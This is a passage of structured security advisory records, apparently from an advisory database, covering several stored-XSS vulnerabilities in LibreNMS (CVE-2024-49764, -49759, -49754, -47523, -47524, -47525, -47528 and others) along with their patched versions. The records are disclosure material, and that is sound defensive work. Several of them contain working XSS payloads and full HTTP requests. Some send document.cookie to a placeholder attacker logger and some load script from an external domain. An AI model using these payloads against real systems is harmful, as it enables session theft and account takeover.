\u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F\u003cattacker_domain\u003e%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22\u0026snmp=on\u0026sysName=\u0026hardware=\u0026os=\u0026os_id=\u0026snmpver=v2c\u0026port=\u0026transport=udp\u0026port_assoc_mode=ifIndex\u0026community=\u0026authlevel=noAuthNoPriv\u0026authname=\u0026authpass=\u0026authalgo=SHA\u0026cryptopass=\u0026cryptoalgo=AES\u0026force_add=on\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Capture Debug Information\" page of the device. The attacker can redirect the user to a malicious domain and capture non-httponly cookies, potentially compromising the user's account and allowing unauthorized actions.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:27:42.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-rmr4-x6c9-jc68","https://github.com/librenms/librenms/commit/af15eabbb1752985d36f337cecf137a947e170f6","https://nvd.nist.gov/vuln/detail/CVE-2024-49764","https://github.com/advisories/GHSA-rmr4-x6c9-jc68"],"source_kind":"github","identifiers":["GHSA-rmr4-x6c9-jc68","CVE-2024-49764"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.932Z","updated_at":"2026-09-03T00:06:51.053Z","epss_percentage":0.00391,"epss_percentile":0.32439,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybXI0LXg2YzktamM2OM4ABBY0","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1ybXI0LXg2YzktamM2OM4ABBY0","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1ybXI0LXg2YzktamM2OM4ABBY0/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04ODhqLXBqcWgtZng1OM4ABBYz","url":"https://github.com/advisories/GHSA-888j-pjqh-fx58","title":"Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/edituser.inc.php","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Manage User Access\" page allows authenticated users to inject arbitrary JavaScript through the \"bill_name\" parameter when creating a new bill. This vulnerability can lead to the execution of malicious code when visiting the \"Bill Access\" dropdown in the user's \"Manage Access\" page, potentially compromising user sessions and allowing unauthorized actions.\n\n### Details\nWhen creating a new bill, an attacker can inject the following XSS payload into the \"bill_name\" parameter:\n```test1'\"\u003e\u003cscript/src=//15.rs\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe payload triggers in the \"Bill Access\" dropdown when the user's \"Manage Access\" page is visited. The sink responsible for this issue is:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/edituser.inc.php#L309\n\n### PoC\n1. Create a new bill using the following payload in the \"bill_name\" parameter:\n```test1'\"\u003e\u003cscript/src=//15.rs\u003e```\n2. Save the bill.\n3. Navigate to the \"Manage Access\" page for the user.\n4. Observe that the injected script executes in the \"Bill Access\" dropdown.\n\nExample Request:\n```http\nPOST /bill/bill_id=2/view=edit/ HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026action=update_bill\u0026bill_name=test1%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E\u0026bill_type=cdr\u0026bill_cdr=\u0026bill_cdr_type=Kbps\u0026dir_95th=in\u0026bill_quota=\u0026bill_quota_type=MB\u0026bill_day=1\u0026bill_custid=test2%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E\u0026bill_ref=test3%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E\u0026bill_notes=test4%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E\u0026Submit=Save\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the \"Manage Access\" page. The attacker can perform unauthorized actions or compromise user accounts by exploiting this vulnerability.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:25:56.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-888j-pjqh-fx58","https://github.com/librenms/librenms/commit/237f4d2e818170171dfad6efad36a275cd2ba8d0","https://nvd.nist.gov/vuln/detail/CVE-2024-49759","https://github.com/advisories/GHSA-888j-pjqh-fx58"],"source_kind":"github","identifiers":["GHSA-888j-pjqh-fx58","CVE-2024-49759"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.963Z","updated_at":"2026-09-03T00:06:51.053Z","epss_percentage":0.00413,"epss_percentile":0.34064,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ODhqLXBqcWgtZng1OM4ABBYz","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04ODhqLXBqcWgtZng1OM4ABBYz","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04ODhqLXBqcWgtZng1OM4ABBYz/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jODZxLXJqMzctOGY4Nc4ABBYy","url":"https://github.com/advisories/GHSA-c86q-rj37-8f85","title":"LibreNMS has a stored XSS in ExamplePlugin with Device's Notes","description":"### Summary\n\nThe application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.\n\n### Details\n\nUser with Admin role can add Notes to a device, the application did not properly sanitize the user input, when the ExamplePlugin enable, if java script code is inside the device's Notes, its will be trigger.\n\n### PoC\n\n1. As an admin user, enable the ExamplePlugin.\n\n![image](https://github.com/user-attachments/assets/409f3a0c-7fac-46e3-8140-84749a120dd9)\n\n2. Add the payload `\u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e` into the device Notes\n\n![image](https://github.com/user-attachments/assets/c2a57dbd-ea07-4166-8b29-61be6ad6c2b6)\n\n3. Once visit the Overview of the Device, a pop-up will show up.\n\n![image](https://github.com/user-attachments/assets/3c9b87c3-d010-49e7-bd13-4a715db4e0c3)\n\n### Impact\n\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions.\nImpacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-11-15T15:17:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/librenms/librenms/security/advisories/GHSA-c86q-rj37-8f85","https://github.com/librenms/librenms/commit/24b142d753898e273ec20b542a27dd6eb530c7d8","https://nvd.nist.gov/vuln/detail/CVE-2024-49758","https://github.com/advisories/GHSA-c86q-rj37-8f85"],"source_kind":"github","identifiers":["GHSA-c86q-rj37-8f85","CVE-2024-49758"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:38.995Z","updated_at":"2026-09-03T00:06:51.053Z","epss_percentage":0.00341,"epss_percentile":0.2728,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jODZxLXJqMzctOGY4Nc4ABBYy","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jODZxLXJqMzctOGY4Nc4ABBYy","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jODZxLXJqMzctOGY4Nc4ABBYy/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nZndyLXhxbWotajI3ds4ABBYx","url":"https://github.com/advisories/GHSA-gfwr-xqmj-j27v","title":"LibreNMS has a stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/api-access.inc.php","description":"### Summary\n\nA Stored Cross-Site Scripting (XSS) vulnerability in the API-Access page allows authenticated users to inject arbitrary JavaScript through the \"token\" parameter when creating a new API token. This vulnerability can result in the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions.\n\n### Details\n\nThe vulnerability occurs when creating a new API Token. An attacker can inject arbitrary JavaScript into the \"token\" parameter, which is then executed when the API Access page is visited. The payload is triggered twice—once in the \"Token Hash\" column and once in the \"QR Code\" column.\n\nThe payload used to exploit this vulnerability is: `'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e`\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe vulnerability is due to insufficient sanitization of the \"token_hash\" variable before it is output in the HTML. This is evident in the following lines of code:\n\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/api-access.inc.php#L152\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/api-access.inc.php#L153\n\n### PoC\n\n1. Create a new API token with the following payload in the \"token\" parameter: `'\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e`\n2. Save the token.\n3. Navigate to the API Access page.\n4. Observe that the injected script executes twice, once in the \"Token Hash\" column and once in the \"QR Code\" column.\n\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-CSRF-TOKEN: \u003cyour_token\u003e\nX-Requested-With: XMLHttpRequest\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026user_id=1\u0026token='\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026description=t'\"\u003e\u003cscript/src=//15.rs\u003e\u0026type=token-item-create\n```\n\n### Impact\n\nThe vulnerability allows authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. This can lead to account compromise and enable unauthorized actions on behalf of the impacted users.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-11-15T15:11:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L","references":["https://github.com/librenms/librenms/security/advisories/GHSA-gfwr-xqmj-j27v","https://github.com/librenms/librenms/commit/25988a937cbaebd2ba4c0517510206c404dfb359","https://nvd.nist.gov/vuln/detail/CVE-2024-49754","https://github.com/advisories/GHSA-gfwr-xqmj-j27v"],"source_kind":"github","identifiers":["GHSA-gfwr-xqmj-j27v","CVE-2024-49754"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.0,"created_at":"2024-11-15T16:07:39.033Z","updated_at":"2026-09-03T00:06:51.054Z","epss_percentage":0.71083,"epss_percentile":0.99357,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nZndyLXhxbWotajI3ds4ABBYx","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nZndyLXhxbWotajI3ds4ABBYx","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.10.0","vulnerable_version_range":"\u003c= 24.9.1"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nZndyLXhxbWotajI3ds4ABBYx/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14OGdtLWozNnAtZnBwZs4AA_6E","url":"https://github.com/advisories/GHSA-x8gm-j36p-fppf","title":"LibreNMS vulnerable to Stored Cross-site Scripting via File Upload","description":"### Summary\nStored Cross-Site Scripting (XSS) can archive via Uploading a new Background for a Custom Map.\n\n### Details\nUsers with \"admin\" role can set background for a custom map, this allow the upload of SVG file that can contain XSS payload which will trigger onload. This led to Stored Cross-Site Scripting (XSS).\n\n### PoC\n1. Login using an Admin role account.\n\n2. Go over to \"$URL/maps/custom\", the Manage Custom Maps.\n![image](https://github.com/user-attachments/assets/9d621532-7880-4010-b12d-efd377f0cfdd)\n\n3. Create a new map then choose to edit it.\n4. Choose the \"Set Background\" option.\n![image](https://github.com/user-attachments/assets/dc2e9453-ef3e-4649-a42f-60b7a2ad8189)\n\n5. Choose to upload a SVG file that have this content.\n```svg\n\u003csvg xmlns=\"http://www.w3.org/2000/svg\" onload=\"alert(document.domain)\"\u003e\n  \u003ccircle cx=\"50\" cy=\"50\" r=\"40\" /\u003e\n\u003c/svg\u003e\n```\n\n6. Once uploaded, there should be a link to the SVG return in the POST request to the API \"$URL/maps/custom/1/background\".\n![image](https://github.com/user-attachments/assets/dc224960-0bd3-42c9-ad49-2ec85b065939)\n\n7. Go over to that link on browser, should see a pop-up.\n![image](https://github.com/user-attachments/assets/47a7db14-bd89-48fe-885a-fd80a052115e)\n\n### Impact\nAttacker can use this to perform malicious java script code for malicious intent.\nThis would impact other Admin role users and the Global Read role users. Normal users does not have permission to read the file, so they are not affected.\n","origin":"UNSPECIFIED","severity":"LOW","published_at":"2024-10-01T22:27:32.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":1.8,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-x8gm-j36p-fppf","https://nvd.nist.gov/vuln/detail/CVE-2024-47528","https://github.com/librenms/librenms/commit/d959bf1b366319eda16e3cd6dfda8a22beb203be","https://github.com/advisories/GHSA-x8gm-j36p-fppf"],"source_kind":"github","identifiers":["GHSA-x8gm-j36p-fppf","CVE-2024-47528"],"repository_url":"https://github.com/librenms/librenms","blast_radius":0.5418539921951662,"created_at":"2024-10-01T23:06:22.366Z","updated_at":"2026-09-03T00:07:07.389Z","epss_percentage":0.00388,"epss_percentile":0.31532,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OGdtLWozNnAtZnBwZs4AA_6E","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14OGdtLWozNnAtZnBwZs4AA_6E","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.9.0","vulnerable_version_range":"\u003c 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14OGdtLWozNnAtZnBwZs4AA_6E/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03Zjg0LTI4cWgtOTQ4Ns4AA_52","url":"https://github.com/advisories/GHSA-7f84-28qh-9486","title":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Transports\" feature","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Alert Transports\" feature allows authenticated users to inject arbitrary JavaScript through the \"Details\" section (which contains multiple fields depending on which transport is selected at that moment). This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.\n\n### Details\nThe vulnerability occurs when creating an alert transport. The application does not properly sanitize the user input in the \"Details\" field, allowing an attacker to inject and store arbitrary JavaScript. This script is then executed in the context of the page whenever the alert transport is viewed or processed.\n\nFor instance, the following payload can be used to trigger the XSS:\n```test1\u003cscript\u003e{onerror=alert}throw 1337\u003c/script\u003e```\n\nWhen the page containing the transport details is loaded, this payload causes the browser to execute the injected script, which in this case triggers an alert popup.\n\nThe root cause of the vulnerability is that the application does not sanitize the value of $instance-\u003edisplayDetails before appending it to the HTML output. This is demonstrated in the following code:\nhttps://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40\n\n### PoC\n1. Create a new alert transport in the LibreNMS interface.\n2. Depending on the transport chosen, just input the following payload in any field that ends up in the \"Details\" section:\n```test1\u003cscript\u003e{onerror=alert}throw 1337\u003c/script\u003e```\n3. Save the transport and trigger the alert.\n4. When the transport details are accessed, the injected script executes, displaying an alert popup.\n\nExample Request:\n\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: \u003cyour_XSRF_token\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026transport_id=2\u0026type=alert-transports\u0026name=Test1\u0026transport-choice=canopsis-form\u0026_token=Ep6belaqXe5qE301CGmtoOWJ71gvRfBXjRyhXEpH\u0026transport-type=canopsis\u0026canopsis-host=localhost%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E\u0026canopsis-port=5000\u0026canopsis-user=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E\u0026canopsis-pass=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E\u0026canopsis-vhost=%3Cscript%3E%7Bonerror%3Dalert%7Dthrow+1337%3C%2Fscript%3E\n```\n\n### Impact\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-10-01T20:31:22.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.2,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:L/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-7f84-28qh-9486","https://github.com/librenms/librenms/commit/ee1afba003d33667981e098c83295f599d88439c","https://github.com/librenms/librenms/blob/4777247327c793ed0a3306d0464b95176008177b/includes/html/print-alert-transports.php#L40","https://nvd.nist.gov/vuln/detail/CVE-2024-47523","https://github.com/advisories/GHSA-7f84-28qh-9486"],"source_kind":"github","identifiers":["GHSA-7f84-28qh-9486","CVE-2024-47523"],"repository_url":"https://github.com/librenms/librenms","blast_radius":1.5653559774527024,"created_at":"2024-10-01T21:06:14.378Z","updated_at":"2026-09-03T00:07:07.390Z","epss_percentage":0.00593,"epss_percentile":0.45524,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjg0LTI4cWgtOTQ4Ns4AA_52","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03Zjg0LTI4cWgtOTQ4Ns4AA_52","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.9.0","vulnerable_version_range":"\u003c 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjg0LTI4cWgtOTQ4Ns4AA_52/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mYzM4LTIyNTQtNDhnN84AA_51","url":"https://github.com/advisories/GHSA-fc38-2254-48g7","title":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Device Group\" Name","description":"### Summary\nThe application fail to sanitising inputs properly and rendering the code from user input to browser which allow an attacker to execute malicious javascript code.\n\n### Details\nUser with Admin role can create a Device Groups, the application did not properly sanitize the user input in the Device Groups name, when user see the detail of the Device Group, if java script code is inside the name of the Device Groups, its will be trigger.\n\n### PoC\n1. Login as an Admin role user. Then go over to \"$URL/device-groups\"\n\n2. Create a new Device Group with this payload in their name\n```js\n\u003cimg src=\"x\" onerror=\"alert(document.cookie)\"\u003e\n```\n![image](https://github.com/user-attachments/assets/2764b313-ee65-47e9-ab57-559d75f4575c)\n\n3. Go over to the detail page of that Device Groups, in this case \"$URL/devices/group=2\". Will see a pop-up.\n![image](https://github.com/user-attachments/assets/f743ca74-5dcb-4e72-ac56-dda2b42e2986)\n\n### Impact\nAttacker can use this to perform malicious java script code for malicious intent.\nThis would impact all users as anyone can have access to the detail page of the device group.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2024-10-01T20:31:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-fc38-2254-48g7","https://github.com/librenms/librenms/commit/d3b51560a8e2343e520d16e9adc72c6951aa91ee","https://nvd.nist.gov/vuln/detail/CVE-2024-47524","https://github.com/advisories/GHSA-fc38-2254-48g7"],"source_kind":"github","identifiers":["GHSA-fc38-2254-48g7","CVE-2024-47524"],"repository_url":"https://github.com/librenms/librenms","blast_radius":2.1975189683470626,"created_at":"2024-10-01T21:06:14.756Z","updated_at":"2026-09-03T00:07:07.390Z","epss_percentage":0.00507,"epss_percentile":0.40506,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mYzM4LTIyNTQtNDhnN84AA_51","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mYzM4LTIyNTQtNDhnN84AA_51","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.9.0","vulnerable_version_range":"\u003c 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mYzM4LTIyNTQtNDhnN84AA_51/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qMmo5LTdwcjYteHF3ds4AA_50","url":"https://github.com/advisories/GHSA-j2j9-7pr6-xqwv","title":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Rules\" feature","description":"### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Alert Rules\" feature allows authenticated users to inject arbitrary JavaScript through the \"Title\" field. This vulnerability can lead to the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and allowing unauthorized actions.\n\n### Details\nThe vulnerability occurs when creating an alert rule. The application does not properly sanitize user inputs in the \"Title\" field, which allows an attacker to escape the attribute context where the title is injected (data-content). Despite some character restrictions, the attacker can still inject a payload that leverages available attributes on the div element to execute JavaScript automatically when the page loads.\n\nFor example, the following payload can be used:\n```test1'' autofocus onfocus=\"document.location='https://\u003cattacker-url\u003e/logger.php?c='+document.cookie\"```\n\nThis payload triggers the XSS when the affected page is loaded, automatically redirecting the user to the attacker's controlled domain with any non-httponly cookies present.\n\nThe vulnerability stems from the application not sanitizing the value of $rule['name'] before adding it to the $enabled_msg variable. This is evident in the code:\n\nhttps://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405\n\n### PoC\n\n1. Create a new alert rule in the LibreNMS interface.\n2. In the \"Title\" field, input the following payload:\n```test1'' autofocus onfocus=\"document.location='https://\u003cattacker-url\u003e/logger.php?c='+document.cookie\"```\n3. Save the rule and trigger the alert.\n4. Observe that when the page loads, the injected JavaScript executes and redirects the user, sending their non-httponly cookies to the attacker's server.\n\nExample Request:\n```http\nPOST /ajax_form.php HTTP/1.1\nHost: \u003cyour_host\u003e\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: \u003cyour_XSRF_token\u003e\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026device_id=-1\u0026device_name=invalid+hostname\u0026rule_id=17\u0026type=alert-rules\u0026template_id=\u0026builder_json=%7B%22condition%22%3A%22AND%22%2C%22rules%22%3A%5B%7B%22id%22%3A%22access_points.accesspoint_id%22%2C%22field%22%3A%22access_points.accesspoint_id%22%2C%22type%22%3A%22string%22%2C%22input%22%3A%22text%22%2C%22operator%22%3A%22not_equal%22%2C%22value%22%3A%22test2'%5C%22%22%7D%5D%2C%22valid%22%3Atrue%7D\u0026name=test1''+autofocus+onfocus%3D%22document.location%3D'https%3A%2F%2F\u003cattacker_url\u003e%2Flogger.php%3Fc%3D'%2Bdocument.cookie%22\u0026builder_rule_0_filter=access_points.accesspoint_id\u0026builder_rule_0_operator=not_equal\u0026builder_rule_0_value_0=test2'%22\u0026severity=warning\u0026count=1\u0026delay=1m\u0026interval=5m\u0026recovery=on\u0026acknowledgement=on\u0026maps%5B%5D=1\u0026proc=\u0026notes=Test2'%22\u0026override_query=on\u0026adv_query=select+'test3'%22'%3B\n```\n\n### Impact\nIt could allow authenticated users to execute arbitrary JavaScript code in the context of other users' sessions. Impacted users could have their accounts compromised, enabling the attacker to perform unauthorized actions on their behalf.\n","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2024-10-01T20:31:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.0,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:H/SI:L/SA:L/E:P","references":["https://github.com/librenms/librenms/security/advisories/GHSA-j2j9-7pr6-xqwv","https://github.com/librenms/librenms/commit/7620d220e48563938d869da7689b8ac3f7721490","https://github.com/librenms/librenms/blob/9455173edce6971777cf6666d540eeeaf6201920/includes/html/print-alert-rules.php#L405","https://nvd.nist.gov/vuln/detail/CVE-2024-47525","https://github.com/advisories/GHSA-j2j9-7pr6-xqwv"],"source_kind":"github","identifiers":["GHSA-j2j9-7pr6-xqwv","CVE-2024-47525"],"repository_url":"https://github.com/librenms/librenms","blast_radius":1.505149978319906,"created_at":"2024-10-01T21:06:14.793Z","updated_at":"2026-09-03T00:07:07.391Z","epss_percentage":0.27904,"epss_percentile":0.97927,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qMmo5LTdwcjYteHF3ds4AA_50","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qMmo5LTdwcjYteHF3ds4AA_50","packages":[{"ecosystem":"packagist","package_name":"librenms/librenms","versions":[{"first_patched_version":"24.9.0","vulnerable_version_range":"\u003c 24.9.0"}],"purl":null}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qMmo5LTdwcjYteHF3ds4AA_50/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1nY2dwLXEyanEtZnc1Ms4AA_5z","url":"https://github.com/advisories/GHSA-gcgp-q2jq-fw52","title":"LibreNMS has Stored Cross-site Scripting vulnerability in \"Alert Templates\" feature","description":"### Summary\nA Self Cross-Site Scripting (Self-XSS) vulnerability in the \"Alert Templates\" feature allows users to inject arbitrary JavaScript into the alert template's name. This script executes immediately upon submission but does not persist after a page refresh.\n\n### Details\nThe vulnerability occurs when creating an alert template in the LibreNMS interface. Although the application sanitizes the \"name\" field when storing it in the database, this newly created template is immediately added to the table without any sanitization being applied to the name, allowing users to inject arbitrary JavaScript. This script executes when the template is created but does not persist in the database, thus preventing stored XSS.\n\nFor instance, the following payload can be used to exploit the vulnerability:\n```test1\u003cscript\u003e{onerror=alert}throw 1337\u003c/script\u003e```\n\nThe root cause of this vulnerability lies in the lack of sanitization of the \"name\" variable before it is rendered in the table. The vulnerability exists because the bootgrid function of the jQuery grid plugin does not sanitize the text being added to the table. Although tags are stripped before being added to the database (as shown in the code below), the vulnerability still allows Self-XSS during the creation of the template.\n\nWhere the variable is being sanitized before being stored in the database:\nhttps://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/forms/alert-templates.inc.php#L40\n\nWhere the vulnerability is happening:\nhttps://github.com/librenms/librenms/blob/0e741e365aa974a74aee6b43d1b4b759158a5c7e/includes/html/modal/alert_template.inc.php#L205 \n\n### PoC\n1. Navigate to the \"Alert Templates\" creation page in the LibreNMS interface.\n2. In the \"Name\" field, input the following payload:\n```test1\u003cscript\u003e{onerror=alert}throw 1337\u003c/script\u003e```\n3. Submit the form to create the alert template.\n4. Observe that the JavaScript executes immediately, triggering an alert popup. However, this code does not persist after refreshing the page.\n\n### Impact\nThis is a Self Cross-Site Scripting (Self-XSS) vulnerability. Although the risk is lower compared to traditional XSS, it can still be exploited through social engineering or tricking users into entering or interacting with malicious code. This can lead to unauthorized actions or data exposure in the context of the affected user's 